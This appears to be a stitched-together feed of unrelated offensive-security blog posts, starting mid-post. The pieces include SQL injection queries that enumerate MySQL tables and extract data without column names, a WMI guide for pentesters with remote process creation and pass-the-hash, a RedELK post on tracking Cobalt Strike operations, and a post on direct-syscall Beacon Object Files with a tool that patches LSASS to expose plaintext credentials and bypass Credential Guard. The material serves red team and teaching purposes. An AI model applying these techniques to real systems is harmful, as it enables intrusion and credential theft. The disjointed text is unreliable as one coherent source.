mysql> SELECT TABLE_NAME FROM `information_schema`.`INNODB_BUFFER_PAGE` WHERE TABLE_NAME REGEXP  DATABASE();
+-----------------------+
| TABLE_NAME            |
+-----------------------+
| `security`.`emails`   |
| `security`.`referers` |
| `security`.`uagents`  |
| `security`.`users`    |
| `security`.`flag`     |
+-----------------------+

mysql> SELECT TABLE_NAME FROM `information_schema`.`INNODB_BUFFER_PAGE_LRU` WHERE TABLE_NAME REGEXP DATABASE();
+-----------------------+
| TABLE_NAME            |
+-----------------------+
| `security`.`emails`   |
| `security`.`referers` |
| `security`.`uagents`  |
| `security`.`users`    |
| `security`.`flag`     |
+-----------------------+
5 rows in set (0.06 sec)

mysql> SELECT path FROM  `information_schema`.`INNODB_SYS_DATAFILES` WHERE path REGEXP DATABASE();
+-------------------------+
| path                    |
+-------------------------+
| .\security\users.ibd    |
| .\security\emails.ibd   |
| .\security\uagents.ibd  |
| .\security\referers.ibd |
| .\security\flag.ibd     |
+-------------------------+
5 rows in set (0.00 sec)

mysql> SELECT NAME FROM `information_schema`.`INNODB_SYS_TABLESPACES` WHERE NAME REGEXP DATABASE();
+-------------------+
| NAME              |
+-------------------+
| security/users    |
| security/emails   |
| security/uagents  |
| security/referers |
| security/flag     |
+-------------------+
5 rows in set (0.04 sec)

mysql> SELECT NAME FROM `information_schema`.`INNODB_SYS_TABLESTATS` WHERE NAME REGEXP DATABASE();
+-------------------+
| NAME              |
+-------------------+
| security/emails   |
| security/flag     |
| security/referers |
| security/uagents  |
| security/users    |
+-------------------+
5 rows in set (0.00 sec)

Column Names

People often ask me whether there is any method to extract column names. The truth is, you usually don't need to know the column names at all.

If database errors are displayed, you can straight away get the number of columns: compare a row of the target table against a ROW() constructor, and a mismatched column count returns an error revealing the count. The same comparison works in a boolean-based blind scenario: once the guessed column count is correct, the query simply returns 0 (since the compared values aren't equal) instead of an error. After that, data can be extracted without knowing any column names, as sketched below 🙂
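
A minimal sketch of these three tricks (my own reconstruction, assuming the three-column users table used throughout this post):

-- 1. Error-based: a ROW() comparison with mismatched arity raises
--    ERROR 1241 "Operand should contain N column(s)", leaking the column count.
SELECT * FROM users WHERE (SELECT * FROM users LIMIT 1) = ROW(1,1);

-- 2. Boolean-based blind: once the guessed arity is correct, the comparison
--    quietly evaluates to 0 instead of erroring (the values aren't equal).
SELECT (SELECT * FROM users LIMIT 1) = ROW(1,1,1);

-- 3. Extraction without column names: alias the columns through a UNION in a
--    derived table, then select by alias (b is the second column here).
SELECT b FROM (SELECT 1 AS a, 2 AS b, 3 AS c UNION SELECT * FROM users) AS x LIMIT 1,1;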

I hope these come in handy in your next pentest 🙂

WMI 101 for Pentesters

26 February 2020 at 15:07

PowerShell has gained popularity with SysAdmins, and for good reason. It’s on every Windows machine (and now some Linux machines as well), it can interact with almost every service on every machine on the network, and it’s a command-line utility. For the exact same reasons, PowerShell has also become a favourite method for attackers to interact with a victim machine. Because of this, organizations have gotten wise to this attack vector and have put measures in place to mitigate its use. But there’s another way! Many don’t know of another built-in Windows utility that actually pre-dates PowerShell and can also help them in their pentesting engagements. That tool is Windows Management Instrumentation (WMI). This tutorial is a small introduction: we will not only cover using WMI to enumerate information from local and remote machines, but also show you how to start and kill processes! So let’s jump into WMI 101 for pentesters.

Background on WMI

I will keep this article at an introductory level to understand how to enumerate information at a high level. But as with most tutorials, let’s define some terms and provide some historical background. This may get dry but stick with me.

Windows Management Instrumentation (WMI) is Microsoft’s implementation of Web-Based Enterprise Management (WBEM) and the Common Information Model (CIM), standards published by the Distributed Management Task Force (DMTF). Microsoft has officially stated:

Windows Management Instrumentation (WMI) is the infrastructure for management data and operations on Windows-based operating systems.

So what does that mean? Simply, WMI stores a bunch of information about the local machine and allows you to access that data as well as manage Windows computers locally and remotely.

WMI came pre-installed in Windows 2000 and was made available as a download for Windows NT and Windows 95/98. For historical context: Monad, the project that became PowerShell, was born in 2002 and made its first public appearance in 2003. In the spring of 2006, Monad was renamed Windows PowerShell, with a final release in November 2006.

By default, WMI can be accessed through the Windows Script Host (WSH) languages such as VBScript and JScript. Since Windows 7, PowerShell can also be used to access WMI. Furthermore, the IWbem COM API can be used from C/C++, and the ‘System.Management’ namespace from .NET languages such as C#, VB.Net and F#. Almost every popular programming language, such as Python, Ruby, PHP and Delphi, has built-in or third-party libraries that support WMI.

The command-line interface to WMI is called the Windows Management Instrumentation Command-line (WMIC). However, WMI can also be accessed directly with PowerShell. From PowerShell v3 onwards, CIM (Common Information Model) cmdlets are available. The CIM cmdlets interact with WMI over WS-MAN (WinRM). These CIM cmdlets will aid us when classic WMI access is blocked but WinRM is allowed on the target machine.

Exploring Namespaces

WMI namespaces can be explored in several different ways from using WMIC directly or by using PowerShell.

Using WMIC

C:\>wmic /namespace:\\root path __namespace
Name
subscription
DEFAULT
CIMV2
msdtc
Cli
SECURITY
SecurityCenter2
RSOP
District
PEH
StandardCimv2
WMI
directory
Policy
Interop
Hardware
ServiceModel
SecurityCenter
Microsoft
aspnet
Appv

Using PowerShell

Get-WmiObject -namespace "root" -class "__Namespace" | Select Name



Another method is by using WQL, the WMI Query Language. Microsoft’s documentation defines WQL as “a subset of standard American National Standards Institute Structured Query Language (ANSI SQL) with minor semantic changes to support WMI.” So, we can use a commonly understood SQL statement such as:

Get-WmiObject -Query "Select * from __Namespace" -Namespace Root | select Name

 

Exploring Classes

To get a list of WMI classes in a specific namespace using PowerShell, we can use the ‘List’ parameter. In this example we are listing the classes of the default namespace, ‘root\cimv2’.

PS C:\>Get-WmiObject -Namespace root\cimv2 -List
… Output Omitted …
Win32_ShadowContext {} {Caption, ClientAccessible, Description
Differential...}
Win32_MSIResource {} {Caption, Description, SettingID}
Win32_ServiceControl {} {Arguments, Caption, Description, Event...}
Win32_Property {} {Caption, Description, ProductCode, Property...}
Win32_Patch {} {Attributes, Caption, Description, File...}
Win32_PatchPackage {} {Caption, Description, PatchID, ProductCode...}
… Output Omitted …

Another method is using the “Get-CimClass” cmdlet:

Get-CimClass -Namespace root\cimv2

If we want only the classes that start with “win32” inside the “root\cimv2” namespace, we can use a wildcard like this:

Get-WmiObject -Namespace root\cimv2 -Class *Win32* -List

Furthermore, the tool WMI Explorer can be used to have a better view of the namespaces, classes and methods with descriptions and examples.

In summary, each Namespace contains Classes. Classes contain:

  • Properties – Information that can be retrieved.
  • Methods – Functions that can be executed.
  • Instances – Instances of the class objects, each with its own Methods and Properties.
  • Events – Notifications about changes in WMI data and services.
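
For example, the properties and methods of a class can be listed quickly with the CIM cmdlets (a small sketch using Win32_Process):

# Retrieve the class definition, then list its properties and methods
$class = Get-CimClass -Namespace root\cimv2 -ClassName Win32_Process
$class.CimClassProperties | Select-Object Name, CimType
$class.CimClassMethods | Select-Object Name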

WMI Query Language – WQL

We briefly mentioned WQL in an example above, but let’s dive a little deeper. WQL queries can be executed directly with the ‘wbemtest.exe’ binary and with PowerShell, and WQL is used by scripting and programming languages when accessing WMI. For this article I will not go in depth regarding each type; however, WQL queries can be categorized as follows:

  • Instance Queries
  • Event Queries
  • Meta Queries

Once you open the wbemtest binary, click on Connect and create a new connection to the required namespace. If you are creating a connection to a remote machine, you can provide the credentials in this dialog box. In this example, I will connect to the default namespace ‘root\cimv2’.

After creating the connection, click on ‘Query’ to test a WQL query. In this example I will use the following query to enumerate files on the disk from the path “C:\temp”

Select * From Cim_DataFile Where Drive = "C:" And Path = "\\temp\\"

It will enumerate the files in the ‘temp’ folder and display the file names.

This is the PowerShell syntax for the same request:

Get-WmiObject -Query 'Select FileName From Cim_DataFile Where Drive = "C:" And Path = "\\temp\\"'
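
The CIM cmdlet equivalent should give the same result (a sketch):

Get-CimInstance -Query 'Select FileName From Cim_DataFile Where Drive = "C:" And Path = "\\temp\\"'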

 

WMI Verbs

The following is for usage with WMIC:

  • List – List Information
  • Get – Retrieve values
  • Call – Execute a method
  • Set – Set value of a property
  • Create – Creates a new instance
  • Delete – Deletes an instance
  • Assoc – Displays the Associators

Putting WMI All Together

Using WMIC

The following command can be used to list the aliases used in WMIC along with their corresponding WQL queries.

wmic alias list brief

The list is much longer than what you see in the screenshot above. I highly recommend you try this on your own machine to see what I mean. Much lower in the list, you will find the ‘process’ alias, and it uses the “Select * from Win32_Process” WQL query. By using the alias, we can shorten the command in the following way:

wmic process where name='lsass.exe' list brief

In this next example, I am using the ‘get’ verb to retrieve specific properties from the class.

wmic process where name='winword.exe' get name, executablepath

This is an example of using the method ‘GetOwner’ to retrieve the owner of the target process.

wmic process where name='winword.exe' call GetOwner

To create a process we can use the ‘Create’ method. This is widely used by pentesters and in malware to create a remote process.

wmic process call create 'calc.exe'

 

To kill a process the ‘Terminate’ method can be used.

wmic process where name='notepad.exe' call Terminate

Using PowerShell

Now let’s try some similar activities using PowerShell. This time, let’s look for Word.

Get-WmiObject -Class Win32_Process -Filter 'name="winword.exe"'

Next, we’ll filter our data even more to get the information we want.

Get-CimInstance -Class Win32_Process -Filter "name='winword.exe'" -Property Caption, ProcessID, ExecutablePath

 

Using WQL

And how would this look using PowerShell and some WQL? Here, I am selecting the Caption, Process ID and the Executable Path properties from the ‘winword.exe’ process.

Get-WmiObject -Query "Select Caption,ProcessID,ExecutablePath from Win32_Process where name='winword.exe'" -Namespace root\cimv2

Using the CIM cmdlets you can retrieve all information or retrieve a specific property like this:

(Get-CimInstance -Query "Select * from Win32_Process where name='winword.exe'" -Namespace root\cimv2).ProcessID

Listing all the methods of the ‘Win32_Process’ Class can be done like this:

(Get-WmiObject -Class Win32_Process -List).Methods

For executing a method, the ‘Invoke-WmiMethod’ cmdlet is used:

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList @('calc.exe')

Using CIM we can call a method like this:

Invoke-CimMethod -ClassName Win32_Process -Name Create -Arguments @{Commandline = 'calc.exe'}

 

Remote WMIC

We also mentioned above that the same tools can be used over the network. This is the syntax you can use to accomplish the above examples on remote computers:

WMIC

wmic /NODE:"servername" /USER:"yourdomain\administrator" /PASSWORD:password OS GET Name

PowerShell

And, as we did before, here’s how it can be done using PowerShell:

$cred = Get-Credential domain\user
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList @('calc.exe') -ComputerName servername -Credential $cred
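
If WinRM is enabled on the target, the CIM cmdlets provide a WS-MAN based alternative (a sketch; ‘servername’ is a placeholder as above):

$cred = Get-Credential domain\user
$session = New-CimSession -ComputerName servername -Credential $cred
Invoke-CimMethod -CimSession $session -ClassName Win32_Process -Name Create -Arguments @{CommandLine = 'calc.exe'}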

Furthermore, on Linux the tool ‘pth-wmic’ can be used to pass the hash instead of the password:

pth-wmic -U domain/adminuser%LM:NT //host "select * from Win32_ComputerSystem"

Conclusion

As you can see, WMI has loads of functionality, most of which we have yet to explore in this article. But even in the little we explored, you can clearly see that WMI can be used as an alternative when PowerShell is monitored or blocked. In a future article, we can play with WMI’s power in other ways useful to pentesters, such as using it as a C2 channel in engagements.

I hope this article covered the fundamentals of WMI usage and encouraged you to continue researching on your own. With that in mind, here’s a little homework. As with all useful technologies, there will eventually be a new version to expand on the capabilities proven by the previous version. Windows Management Instrumentation (WMI) is no different, as it has been updated to the Windows Management Infrastructure (MI). Microsoft says that MI is fully backwards compatible, reduces development time, and has tighter integration with PowerShell. Go check it out and share what you discover.

 

PowerShell Obfuscation using SecureString

By: @Wietze
20 January 2020 at 00:00
PowerShell has built-in functionality to save sensitive plaintext data to an encrypted object called `SecureString`. Malicious actors have exploited this functionality as a means to obfuscate PowerShell commands. This blog post discusses `SecureString`, examples seen in the wild, and presents a tool [[8](https://wietze.github.io/powershell-securestring-decoder/)] that helps analyse `SecureString` obfuscated commands.

Windows Command-Line Obfuscation

By: @Wietze
23 July 2021 at 00:00
Many Windows applications have multiple ways in which the same command line can be expressed, usually for compatibility or ease-of-use reasons. As a result, command-line arguments are implemented inconsistently, making it harder to detect specific commands due to the number of variations. This post shows how more than 40 often-used, built-in Windows applications are vulnerable to forms of command-line obfuscation, and presents a tool for analysing other executables.

How to get started with bug bounties and finding vulnerabilities | Guest Casey Ellis

By: Infosec
6 December 2021 at 08:00

On this week’s Cyber Work Podcast, BugCrowd and disclose.io! founder Casey Ellis discusses how to think like a cybercriminal, the crucial need for transparent vulnerability disclosure, the origins of BugCrowd and why mentorship is a gift that goes in both directions.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
3:15 - Getting into cybersecurity
4:30 - Criminal mindset in cybersecurity
5:49 - Ellis’s career to date 
9:10 - Healthcare cybersecurity
11:47 - Mentoring others 
13:52 - Mentorship as a two-way street
16:12 - Bugcrowd and bug bounty
19:18 - Vulnerability disclosure project
21:30 - Bug bounty popularity 
24:52 - U.S. sanctions on hacking groups
26:52 - Hiring hackers 
31:52 - Pursue specialization 
33:51 - Cyber threats flying under the radar
39:17 - Working from home safely
40:48 - How to get into bug bounties
42:18 - How to report vulnerabilities
44:04 - Advice to begin ethical hacking 
45:23 - Learn more about Ellis 
45:56 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

RedELK Part 3 – Achieving operational oversight

7 April 2020 at 15:08

This is part 3 of a multipart blog series on RedELK: Outflank’s open sourced tooling that acts as a red team’s SIEM and helps with overall improved oversight during red team operations.

In part 1 of this blog series I discussed the core concepts of RedELK and why you should want a tool like this. In part 2 I described a walk-through on integrating RedELK into your red teaming infrastructure. Read those blogs to get a better background understanding of RedELK.

For this blog I’ve setup and compromised a fictitious company. I use the logs from that hack to walk through various options of RedELK. It should make clear why RedELK is really helpful in gaining operational oversight during the campaign.

Intro: the Stroop lab got hacked

In this blog I continue with the offensive lab setup created in part 2. In summary, this means that the offensive campaign contains two attack scenarios supported by their own offensive infrastructure, named shorthaul and longhaul. Each has its own transport technology and a dedicated Cobalt Strike C2 server. The image below should give you an overview.

The offensive infrastructure as used in this demo

Now let’s discuss the target: Stroop B.V., a fictitious stroopwafel company. Although the competition is catching up, their stroopwafels are regarded as a real treat and enjoyed around the world. Stroop’s IT environment spans a few thousand users and computers, an Active Directory domain with subdomains, and locations (sites) around the world. With regards to security they come from a traditional ‘coconut’ approach: hard security on the outside (perimeter), but no real segmentation or filtering on the inside. They do have a few security measures, such as proxying all internet traffic and dedicated admin accounts and admin workstations for AD-related tasks. Finally, in order to get to the industrial control systems (ICS) that produce the stroopwafels – and guard the recipe – it is required to go via a dedicated jump host.

In this demo, I have gained Domain Admin privileges and DCsync’ed the krbtgt account. I have not accessed the secret recipes, as I do not want to give away too many details for future students of our trainings. Yes, you read that right: this is the same lab setup we use in our trainings. And yes, besides an awesome lab, our students also get to enjoy delicious stroopwafels during our trainings. Not digital, but real stroopwafels. 🙂

In preparation for this blog post I have hacked through the network already. To make it easy for you to play with the same data, I have uploaded every logfile of this demo (Cobalt Strike, HAProxy and Apache) to the RedELK github. You can use this demo data to import into your own RedELK server and to get hands-on experience with using RedELK.

The end result of the running beacons can be seen below in the two overviews from our Cobalt Strike C2 servers.

Beacon overview of the shorthaul scenario
Beacon overview of the longhaul scenario

Why RedELK?

The mere fact that I have to present to you two pictures from two different Cobalt Strike C2 servers is indicative of why we started working on what later became RedELK. Cobalt Strike (or any other C2 framework) is great for live hacking, but it is not great for a central overview. And you really want such a central overview for any bigger red teaming campaign. This is exactly what RedELK does: it gathers all the logs from C2 frameworks and from traffic redirectors, formats and enriches the data, presents it in a single location to give you oversight, and allows for easy searching of the data. Finally, it has some logic to alarm you about suspected blue team analyses.

I’ll cover the alarming in a later blog. In this blog we focus on the central presentation and searching.

RedELK oversight

Let’s start with the oversight functionality of RedELK. We can easily see:

  • Red Team Operations: Every action from every operator on every C2 server
  • Redirector Traffic: All traffic that somewhere touched our infrastructure

Because we put everything in an Elasticsearch database, searching through the data is made easy. This way we can answer questions like ‘Did we touch system X on a specific day?’ or ‘What source IP has scanned our redirectors with a user agent similar to our implant but not on the correct URL?’

Besides free format searching, RedELK ships with several pre-made searches, visualisations and dashboards. These are:

  • CS Downloads: all downloaded files from every Cobalt Strike C2 server, directly accessible for download via your browser.
  • CS Keystrokes: every keystroke logged from every Cobalt Strike C2 server.
  • CS IOCs: every Indicator Of Compromise of your operation.
  • CS Screenshots: every screenshot from every Cobalt Strike C2 server, with thumbnails and full images directly visible via your browser.
  • CS Beacons: list with details of every Cobalt Strike beacon.
  • Beacon dashboard: a dashboard with all relevant info from implants.
  • Traffic dashboard: a dashboard with all relevant info on redirector traffic.

Note: at the moment of writing the stable version of RedELK is 1.0.2. In that version there is full support for Cobalt Strike, but no other C2 framework. However, future stable versions will support other C2 frameworks. The version currently in development already has support for PoshC2, and Covenant is planned next. Also, the names of the pre-made views and searches, and of some fields, are being made more generic to support other C2 frameworks.

We need to login before we can explore some of these views and show the power of search. See the example below where I log in, go to the Discover section in Kibana, change the time period and open one of the pre-made views (redirector traffic dashboard).

Note: every animated GIF in this blog is clickable to better see the details.

Opening the redirector traffic view

Red Team Operations

Let’s start with an overview of every action on every C2 server; select the Red Team Operations view. Every line represents a single log line of your C2 tool, in our case Cobalt Strike. Some events are omitted by default in this view: join-leave events, ‘new beacon’ events from the main Event Log and everything from the weblog. Feel free to modify it to your liking – you can even click ‘Save’ and overwrite one of RedELK’s pre-made views.

In the example below you can see the default layout contains the time, attackscenario, username, internal IP address, hostname, OS and the actual message from the C2 tool. In our case this is 640 events from multiple team servers from both attack scenarios!

Now let’s say the white team asked if, where and when we used PsExec. Easy question to answer! We search for psexec* and are presented with only the logs where psexec was mentioned. In our case only one time, where we jumped from system L-WIN224 to L-WIN227.

Searching for the execution of PsExec across all C2 servers

As you can see, RedELK does a few things for you. First of all, it indexes all the logs, parses relevant items, makes them searchable and presents them to you in an easy interface.

Cobalt Strike users will notice that there is something going on here. How can RedELK give you all the relevant metadata (username, hostname, etc.) per log line, while Cobalt Strike only presents that info in the very first metadata line of a new beacon? Well, RedELK has background scripts running that enrich *every* log line with the relevant data. As a result, every log line from a beacon log has the relevant info such as username, hostname, etc. Very nice!

Another simple but super useful thing we saw in the demo above is that every log line contains a clickable link to the full beacon.log. Full beacon logs directly visible in your browser! Great news for us non-Elasticsearch heroes: CTRL+F for easy searching.

As you can see, a few clicks in a web browser beat SSHing into all of your C2 servers and grepping through the logs (you shouldn’t give everybody in your red team SSH access to your C2 servers anyway, right?).

Now that was the basics. Let’s explore a few more pre-made RedELK views.

List of Indicators of Compromise

In the previous example I searched for PsExec lateral movement actions. As you probably know, PsExec uploads an executable that contains your evil code to the target system, creates a service pointing to this executable and remotely starts that service. This leaves several traces on the remote system, or Indicators of Compromise as the blue team likes to call them. Cobalt Strike does a very good job in keeping track of IOCs it generates. In RedELK I created a parser for such IOC events and pre-made a search for you. As a result you can get a full listing of every IOC of your campaign with a single click. Four clicks if you count the ‘export to CSV’ function of Kibana as well.

IOC overview

Cobalt Strike Downloads

This is one of the functions I am personally most happy with. During our red team operations we often download files from our target to get a better understanding of the business operations (e.g. a manual on payment operations). Most C2 frameworks, Cobalt Strike included, download files from the implant to the C2 server. Before you can open a file you need to sync it to your local client. The reason for this is valid: you don’t want every file to auto-sync to every logged-in operator. But with dozens, maybe hundreds of files per C2 server, and multiple C2 servers in the campaign, I often get lost and no longer know which file was downloaded on which C2. Especially if it was downloaded by one of my colleagues. Within the C2 framework interface it is very hard to search for the file you are looking for. Result: time lost due to useless syncing and viewing of files.

RedELK solves this by presenting an aggregated list of every file from every C2 in the campaign. In the Kibana interface you can see and search all kinds of details (attack scenario name, username, system name, file name, etc). In the background, RedELK has already synced every file to the local RedELK server, allowing for easy one click downloads straight from Kibana.

Metadata and direct access to all downloads from all C2 servers

Logged keystrokes

Ever had difficulties trying to remember which user, at what moment, entered that one specific term that was logged in a keystroke? RedELK to the rescue: one-click presentation of all logged keystrokes. And, of course, searchable.

Searching logged keystrokes

I believe there is more work to be done in formatting the keystroke logs and in alarming when certain keywords are found. But that is left for future versions.

Screenshots

Another thing that was bugging me was trying to recall a specific screenshot from weeks or months earlier in the campaign. Most often I can’t remember the user, but when I see the picture I know what I was looking for. With hundreds of screenshots per C2 server this becomes time consuming.

To solve this, RedELK indexes every screenshot taken, makes it ready for download and presents a thumbnail preview picture. Hooray!

Screenshots overview

I’m not entirely happy just yet with the thumbnail previews, specifically the size. I’m limited by the screen space Kibana allows. Likely something I’ll fix in a new release of RedELK.

Overview of all compromised systems

A final thing I want to discuss from the viewpoint of red team operations is the overview of every C2 beacon in the campaign. RedELK presents this with the CS Beacons overview. This is a great overview of every implant, the system it ran on, the start time and many other details. Again you can use the Kibana export-to-CSV function to generate a list that you can share with blue and/or white.

In this example I want to highlight one thing. RedELK also keeps track if a Cobalt Strike beacon was linked to another beacon. In the example below you can see that beacon ID 455228 was linked to 22170412, which in turn was linked to 1282172642. Opening the full beacon log file and searching for “link to” we circle back to the PsExec example we discussed above.

Metadata on all beacons from the operation

Redirector Traffic

The examples above all covered overview of red team operations. But RedELK also helps you with giving overview and insight into the traffic that has hit your red team infrastructure. This is done by using the pre-made view Redirector Traffic.

Redirector traffic overview

We can see that RedELK parses a lot of information. The default view shows several columns with relevant data, ordered per log line with the latest event on top. Diving into a single log line you can see there are many more information elements. The most important are:

  • The attackscenario, shorthaul in our example.
  • The beat.hostname of the redir this happened on.
  • The full log line as it appeared on the system (message).
  • The IP address of the redirector the traffic was received on (redir.frontendip).
  • The redirprogram name (Apache in this case), and the redir.frontname and redir.backendname on which the traffic was received and sent.
  • Several headers of the HTTP traffic, including X-Host and X-Forwarded-For.
  • The redirtraffic.sourceip of the traffic.
  • In case X-Forwarded-For was set, redirtraffic.sourceip becomes the real client’s address and redirtraffic.sourceipcdn contains the address of the CDN endpoint.

The majority of this information is not available in a default Apache or HAProxy log line. But it is information that the red team is interested in, now or in the future. This is why it is so important to modify the logging configuration of your redirectors. A default log setup means limited info.

RedELK also enriches the data with information from several sources. The GeoIP enrichment was already shown in the previous example – it adds geolocation info and ownership of the IP block, and stores it in geoip.* fields.

RedELK also does reverse DNS lookups for the remote IP addresses, and it sets a tag if the source IP address is found in a local config file such as /etc/redelk/iplist_redteam.conf, /etc/redelk/torexitnodes.conf, etc.

But there is one more enrichment going on that is extremely helpful: Greynoise. Greynoise is a service that aims to identify internet background noise from scanners, both legit ones such as Shodan and Google, and evil ones such as botnets. Most red teams are not necessarily interested in all the details that Greynoise has about an IP address. But they do want to know when an IP address that is *not known* as a scanner is scanning their infra!

Let’s see the example below. We start with almost 9000 log lines of traffic. When opening one event we can see the multitude of info that Greynoise has on this IP. In our example it’s likely a MIRAI botnet scanner and the greynoise.status is ok. But when we filter on greynoise.status:"unknown" and NOT redirtraffic.httpstatus:"200" we get all data from IP addresses that scan our infra but do not belong to publicly known scanners. We went from almost 9000 hits to 44 hits, a number that is easily analysed by the human eye. Would any of these hits be the blue team scanning our infra?

Finding strange traffic to your redirs by filtering on Greynoise status

There are many more examples on interesting searches for traffic hitting your red team infrastructure, e.g. TOR addresses (RedELK tags those), strange user agents such as curl* and python*, etc. But I’m sure you don’t need a blog post to explore these.
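
Still, to give you a head start, a few example searches (greynoise.status and redirtraffic.httpstatus appear above; the user agent field name and the TOR tag value are my assumptions and may differ per RedELK version):

greynoise.status:"unknown" AND NOT redirtraffic.httpstatus:"200"
redirtraffic.useragent:(curl* OR python*)
tags:"iplist_torexitnodes"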

Wrap-up

I hope this blog post has given you a better understanding of what RedELK has to offer and how to use it. There is more: I haven’t even touched on the visualizations and dashboards that come with RedELK, and most importantly, the alarms. That is left for another blog post.

A few closing thoughts to help you have a smooth experience in getting up-and-running with RedELK:

  • Fully follow the installation instructions, including modification of the redirector logging configuration, to get the most out of your data.
  • Also perform post installation tuning by modifying the config files in /etc/redelk/ on the RedELK server.
  • RedELK’s main interface is Kibana. It is easy to get started, has a lot of features but it can be tricky to fully understand the powerful search language. Luckily, most searches can also be done via clicky-clicky. I have absolutely no shame in admitting that even after many years of experience with searching in Kibana I still regularly prefer clicks for more difficult searches.
  • The pre-made views are just that: pre-made. You can delete, modify and rename them to your liking, or create new ones from scratch.

Have fun exploring RedELK and let me know your thoughts!

The post RedELK Part 3 – Achieving operational oversight appeared first on Outflank.

Direct Syscalls in Beacon Object Files

By: Cornelis
26 December 2020 at 10:47

In this post we will explore the use of direct system calls within Cobalt Strike Beacon Object Files (BOF). In detail, we will:

  • Explain how direct system calls can be used in Cobalt Strike BOF to circumvent typical AV and EDR detections.
  • Release InlineWhispers: a script to make working with direct system calls more easy in BOF code.
  • Provide Proof-of-Concept BOF code which can be used to enable WDigest credential caching and circumvent Credential Guard by patching LSASS process memory.

Source code of the PoC can be found here:

https://github.com/outflanknl/WdToggle

Source code of InlineWhispers can be found here:

https://github.com/outflanknl/InlineWhispers

Beacon Object Files

Cobalt Strike recently introduced a new code execution concept named Beacon Object Files (abbreviated to BOF). This enables a Cobalt Strike operator to execute a small piece of compiled C code within a Beacon process.

What’s the benefit of this? Most importantly, we get rid of a concept named fork & run. Before Beacon Object Files, this concept was the default mechanism for running jobs in Cobalt Strike. This means that for execution of most post-exploitation functionality a sacrificial process was started (specified using the spawnto parameter) and subsequently the offensive capability was injected to that process as a reflective DLL. From an AV/EDR perspective, this has various traits that can be detected, such as process spawning, process injection and reflective DLL memory artifacts in a process. In many modern environments fork & run can easily turn into an OPSEC disaster. With Beacon Object Files we run compiled position independent code within the context of Beacon’s current process, which is much more stealthy.

Although the concept of BOF is a great step forward in avoiding AV/EDR for Cobalt Strike post-exploitation activity, we could still face the issue of AV/EDR products hooking API calls. In June 2019 we published a blogpost about Direct System Calls and showed an example how this can be used to bypass AV/EDR software. So far, we haven’t seen direct system calls being utilized within Beacon Object files, so we decided to write our own implementation and share our experiences in this blog post.

Direct syscalls and BOF practicalities

Many Red Teams will be familiar by now with the concept of using system calls to bypass API hooks and avoid AV/EDR detections. 

In our previous system call blog we showed how we can utilize the Microsoft Assembler (MASM) within Visual Studio to include system calls within a C/C++ project. When we build a Visual Studio project that contains assembly code, it generates two object files using the assembler and C compiler, and links all pieces together to form a single executable file.

To create a BOF file, we use a C compiler to produce a single object file. If we want to include assembly code within our BOF project, we need inline assembly in order to generate a single object file. Unfortunately, inline assembly is not supported in Visual Studio for x64 processors, so we need another C compiler which does support inline assembly for x64 processors.

Mingw-w64 and inline ASM

Mingw-w64 is the Windows version of the GCC compiler and can be used to create 32- and 64-bit Windows applications. It runs on Windows, Linux or any other Unix-based OS. Best of all, it supports inline assembly, even for x64 processors. So now we need to understand how we can include assembly code within our BOF source code.

If we look at the man page of the Mingw-w64 or GCC compiler, we notice that it supports assembly using the -masm=dialect syntax:

Using the intel dialect, we can write assembly code in the same dialect as we did with the Microsoft Assembler in Visual Studio. To include inline assembly within our code we can simply use the following assembler template syntax:

        asm("nop \n  "
            "nop \n  "
            "nop")
  • The starting asm keyword is either asm or __asm__
  • Instructions must be separated by a newline (literally \n).

More information about the GCC’s assembler syntax can be found in the following guide: 

https://www.felixcloutier.com/documents/gcc-asm.html#assembler-template

From __asm__  to BOF

Let’s put this together in the following example which shows a custom version of the NtCurrentTeb() routine using inline-assembly. This routine can be used to return a pointer to the Thread Environment Block (TEB) of the current thread, which can then be used to resolve a pointer to the ProcessEnvironmentBlock (PEB):
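
A minimal sketch of what such a function can look like (my own reconstruction, assuming x64, where the GS segment base points at the TEB and the TEB pointer itself is stored at gs:[0x30]):

#include <windows.h>

// Custom NtCurrentTeb() as global inline assembly in the Intel dialect
// (compiled with -masm=intel): return the TEB pointer from gs:[0x30].
EXTERN_C PVOID MyNtCurrentTeb(VOID);

__asm__("MyNtCurrentTeb:        \n"
        "    mov rax, gs:[0x30] \n"
        "    ret                \n");

The ProcessEnvironmentBlock pointer can then be read from the returned TEB structure (offset 0x60 on x64).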

To make this assembly function available within our C code, and to declare its name, return type and parameters, we use the EXTERN_C keyword. This preprocessor macro specifies that the function is defined elsewhere, has C linkage and uses the C-language calling convention. This methodology can also be used to include assembly system call functions within our code. Just transform the system call invocations written in assembly to the assembler template syntax, add the function definitions using the EXTERN_C keyword and save this in a header file, which can be included within our project.

Although it is perfectly valid to have an implementation of a function in a header file, it is not best practice. However, compiling an object file using the -o option allows us to use only one source file, so in order not to bloat our main source file with assembly functions, we put them in a separate header file.
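
To illustrate, a stripped-down header could look like this (a sketch only: the system call number below is valid for common Windows 10 x64 builds, while SysWhispers-style tooling resolves it per build instead of hardcoding it; the Sys prefix is my own naming):

// syscalls.h – a direct system call stub in assembler template syntax
#include <windows.h>
#include <winternl.h>

EXTERN_C NTSTATUS SysNtOpenProcess(
    PHANDLE ProcessHandle,
    ACCESS_MASK DesiredAccess,
    PVOID ObjectAttributes,
    PVOID ClientId);

// x64 syscall stub: first argument moves to r10, syscall number goes in eax.
__asm__("SysNtOpenProcess:    \n"
        "    mov r10, rcx     \n"
        "    mov eax, 0x26    \n"
        "    syscall          \n"
        "    ret              \n");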

To compile a BOF source code which includes inline assembly we use the following compiler syntax:

x86_64-w64-mingw32-gcc -o bof.o -c bof.c -masm=intel 

WdToggle

To demonstrate the whole concept, we wrote Proof-of-Concept code which uses direct system calls via inline assembly and can be compiled to a Beacon Object File.

This code shows how we can enable WDigest credential caching by toggling the g_fParameter_UseLogonCredential global parameter to 1 within the Lsass process (wdigest.dll module). Furthermore, it can be used to circumvent Credential Guard (if enabled) by toggling the g_IsCredGuardEnabled variable to 0 within the Lsass process. 

Both tricks enable us to make plaintext passwords visible again within LSASS, so they can be displayed using Mimikatz. With the UseLogonCredential patch applied you only need a user to lock and unlock his session for plaintext credentials to be available again. 

